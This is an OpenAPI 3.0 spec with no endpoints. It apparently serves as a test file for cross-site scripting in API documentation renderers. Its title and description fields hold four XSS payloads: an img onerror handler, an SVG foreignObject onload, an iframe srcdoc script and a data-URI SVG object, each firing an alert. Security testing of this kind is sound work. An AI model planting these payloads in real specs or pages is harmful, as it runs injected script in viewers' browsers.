openapi: 3.0.0
info:
  title: |
    <img src=x onerror="alert('🔥 Ajju DOM XSS!');">
    <svg><foreignObject><body onload="alert('XSS in SVG foreignObject')"></body></foreignObject></svg>
  description: |
    <!-- Brave attempt: nested iframe fallback -->
    <iframe srcdoc="<script>alert('iframe XSS')</script>"></iframe>
    <object type="image/svg+xml" data='data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg"><script>alert(\"SVG Data XSS\")</script></svg>'></object>
paths: {}
